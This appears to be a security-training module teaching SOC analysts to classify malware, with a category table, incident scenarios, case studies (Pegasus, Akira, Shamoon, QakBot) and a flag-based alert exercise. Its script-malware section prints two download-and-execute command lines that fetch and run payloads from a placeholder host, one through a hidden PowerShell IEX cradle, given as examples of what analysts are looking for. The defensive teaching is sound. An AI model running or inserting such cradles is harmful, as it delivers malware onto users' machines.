Malware Classification

Knowing the main types of malware and how they behave helps analysts spot threats quickly. Malware is not just a single thing; it comes in different categories, each with a specific purpose and attack method. By learning to identify these, teams can better respond to incidents and keep their environments safer.

Malware Categories

Below is a table summarising the most common malware categories, their main purpose, typical behaviour, and a real-world example for each. Some practical, scenario-based examples follow this to show how these types of malware appear in everyday incidents.

Category	Main Purpose	Typical Behaviour	Real-World Example
Adware	Display unwanted advertisements	Display unwanted advertisements	Fireball
Spyware	Collect information secretly	Tracks browsing, records keystrokes, captures data	Hermit
Ransomware	Extort money by locking files or systems	Encrypts data, displays ransom note	WannaCry
Wiper	Destroy data or systems	Overwrites or deletes files permanently	PathWiper
C2 (Command & Control)	Enable remote control by an attacker	Connects to remote server, receives commands	Emotet
Data stealer	Steal sensitive information	Exfiltrates files, credentials, or documents	Lumma Stealer
Keylogger	Record user keystrokes	Captures everything typed on keyboard	Zeus
Cryptominer	Use resources to mine cryptocurrency	High CPU usage, slows systems, network traffic	Coinhive

Scenario-Based Examples

Below are some simple scenarios that show how this type of malware might appear within an organisation.

• Adware: A user’s browser starts showing pop-up ads every few minutes, even when no websites are open. Security tools identify a suspicious program running in the background, which turns out to be adware.
• Spyware: An employee notices their personal emails have been accessed by someone else. Forensics show a spyware program on the workstation, which was recording keystrokes and sending the information to an attacker.
• Ransomware: Several computers display a ransom note, saying that all files have been encrypted and payment is required to unlock them. The SOC traces the incident to a ransomware attack triggered by a malicious email attachment.
• Wiper: An organisation’s servers suddenly crash, and files are overwritten with random data. Investigation reveals wiper malware designed to destroy data rather than demand a ransom.
• Command and Control (C2) malware: An endpoint is found reaching out to unfamiliar domains at odd hours. Analysts discover C2 malware that gives attackers remote access, allowing them to run commands or move files.
• Data stealer: Sensitive documents start leaking online. The incident response team finds a data stealer malware that collected files from user directories and sent them to an external server.
• Keylogger: Users report unauthorised transfers from company bank accounts. Analysis shows a keylogger running on the accountant’s computer, recording every keystroke, including passwords.
• Cryptominer: Several desktops become slow and fans are running constantly. Monitoring tools reveal high CPU usage linked to a cryptominer that hijacks the computers to mine cryptocurrency.

Malware is not just a concept found in textbooks. Security teams deal with malware categories like spyware, ransomware, wipers, data stealers, keyloggers, and remote access trojans (RATs) in real incidents. Seeing how each type appears in actual attacks helps contextualise the theory and make the patterns easier to remember. We often refer to malware that relates to or is similar to each other as part of the same malware family.

A malware family refers to a group of malicious programs that share the same origin or codebase and behave similarly. Grouping malware like this helps security teams apply known defences and improve detection and response. Below are short case studies for known malware and links to learn more.

Spyware

Case Study, Pegasus:

Pegasus is one of the most well-known spyware tools, used to target mobile phones worldwide. Attackers send a specially crafted message or exploit a vulnerability to install Pegasus silently. Once on a device, it collects text messages, location data, emails, and microphone or camera recordings. Victims range from journalists and politicians to business leaders.

MITRE ATT&CK: TA0009 (Collection), TA0010 (Exfiltration)

Ransomware

Case Study, Akira:

Akira is a modern ransomware variant known for targeting businesses, schools, and public services. Attackers use phishing emails, stolen credentials, or remote access software to breach networks. Once inside, Akira spreads, encrypts key files, and displays a ransom note demanding cryptocurrency. This group is known for threatening to leak stolen data if the ransom is not paid.

MITRE ATT&CK: TA0040 (Impact), TA0011 (Command and Control)

For example, we can observe the ransom note that the Akira ransomware leaves once a host is compromised.

Wiper

Case Study, Shamoon:

Shamoon targeted energy companies in the Middle East, most famously Saudi Aramco. The malware rapidly overwrote files with useless data, making systems unusable. Entire networks went offline, and recovery took weeks. Shamoon showed that wipers can cause as much damage as ransomware, but without demanding payment.

MITRE ATT&CK: TA0040 (Impact)

Data Stealer

Case Study, Agent Tesla:

Agent Tesla is commonly delivered by phishing emails with attachments. Once opened, it captures keystrokes, screenshots, and credentials from web browsers and email clients. The stolen data is sent to command-and-control servers controlled by the attacker. Agent Tesla has been used in thousands of global attacks and continues to evolve.

MITRE ATT&CK: TA0010 (Exfiltration)

Above, we can observe an example from a forum where a threat actor has leaked data.

Keylogger

Case Study, RedLine Stealer:

RedLine Stealer acts as both a data stealer and a keylogger. It spreads through phishing or malicious websites, then captures keystrokes, browser cookies, and cryptocurrency wallet information. The data is then exfiltrated to the attacker’s server. RedLine is commonly used by cybercriminals for credential theft and fraud.

MITRE ATT&CK: TA0006 (Credential Access) TA0010 (Exfiltration)

C2 RAT Malware 

Case Study, QakBot:

QakBot, also known as QBot, has become one of the most active and dangerous malware families targeting organisations globally. Originally designed as a banking trojan, QakBot has evolved into a modular RAT used by cybercriminal groups for initial access, credential theft, and as a loader for ransomware like Black Basta. QakBot typically arrives through phishing emails with malicious attachments or links. Once inside a network, it establishes a connection to its command-and-control servers, enabling attackers to move laterally, steal data, or deploy additional malware. In 2023, QakBot was responsible for several high-profile incidents, and law enforcement agencies have issued warnings about its continued activity.

MITRE ATT&CK: TA0011 (Command and Control), TA0002 (Execution), TA0006 (Credential Access) 

Malware can arrive in different forms. Two of the most common categories are binary malware (compiled executables) and script-based malware (written in scripting languages). Understanding the difference helps SOC analysts make better decisions when reviewing alerts or suspicious files.

While script-based malware has become popular for its flexibility and ease of modification, executables remain widely used by attackers. They can offer more stability, support complex payloads, and are still effective in environments where security tools are misconfigured or outdated. Both types continue to be seen in real-world intrusions.

Binary Malware

Executable-based malware is typically delivered as compiled files such as .exe (Windows Executable) or .dll (Dynamic Link Library). These files are created from source code and need to be run on a compatible operating system. Common delivery methods for binaries include email attachments (for example, invoice.pdf.exe), malicious downloads, removable media, or as part of another infection. Sometimes, attackers disguise executables by using misleading icons or hiding the real file extension. A way to identify an executable is through a checksum, since executables, once compiled and redistributed, do not change. For example, we can calculate the md5sum of a file and identify the malware regardless of any name or extension change. Each binary may contain hardcoded strings or byte sequences that can serve as unique identifiers. These are commonly used by antivirus and detection engines.

Script-based Malware

Script-based malware relies on scripts written in languages such as JavaScript (.js), Visual Basic Script (.vbs), Windows batch (.bat), or PowerShell (.ps1). Scripts can be easier for attackers to change and adapt. They often arrive as email attachments, within Office documents containing macros, or through malicious websites. For example, a user might open an email attachment called report.docm, which contains a macro that runs a hidden PowerShell script. Scripts are also popular for initial access, allowing an attacker to run code directly in memory without writing files to disk.

There are some clear warning signs that a script may be acting maliciously:

• The script downloads or runs other files from the internet. 
• It makes changes to system settings or disables security tools.
• It runs commands that are not usually part of standard operation, especially with encoded or obfuscated content.
• The script unexpectedly launches other applications, such as PowerShell or CMD.

For example, below we can find an example of an unobfuscated bat script-based malware:

@echo off
powershell -Command "Invoke-WebRequest http://malicious.site/payload.exe -OutFile C:\Users\Public\payload.exe" start C:\Users\Public\payload.exe

The script above downloads a malware executable and runs it on the victim’s machine. Similarly, we can find a similar example to this one in PowerShell:

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"

The above runs a script from a remote server, often without leaving files behind.

Script-based Example

Let's now observe an obfuscated real malware. In this case, this example corresponds to the LummaStealer, a popular stealer coded in C that is being used as a MaaS (malware as a service). This example is from August 2025, and it's a sample used to deliver the malware.

As we can observe, there's a lot of data if we scroll down. A function is declared Swvldsp2195, and then a huge variable full of data named qble51

Finally, we can observe that, in the end, this data is base64 decrypted and executed in memory using a .NET assembly (to execute in memory and not disk), as shown below.

While the above is an easy-to-follow example, more obfuscated script-based malware is very common, and there is a wide variety of these threats. This shows us how threat actors may try to deliver and obfuscate malware within an organisation.

It’s time to put our knowledge to the test. As a SOC analyst, let’s review some alerts in your dashboard and apply what has been learned. 

Click on the View Site button attached to this task to display the static site in split view. Review each alert, and select the correct malware classification to retrieve the flag.

Alternatively, if you can not see all the columns in split view, you can open the static site in full screen by clicking the link below:

Malware continues to be one of the most frequent threats defenders face, and understanding how to classify it helps improve detection and response. Throughout this room, different types of malware were introduced, including how they behave and appear in real-world incidents and how security teams can identify and categorise them. Users learned to distinguish between malware families such as spyware, ransomware, wipers, and keyloggers, and reviewed real case studies to help build intuition. The differences between binary and script-based malware were also covered, along with common delivery methods and indicators of compromise.

Key takeaways:

• Learn how to identify and classify common types of malware.
• Understand how malware behaves and spreads in real-world incidents.
• Distinguish between binary and script-based malware formats.
• Apply classification skills using alert analysis in a simulated SOC environment.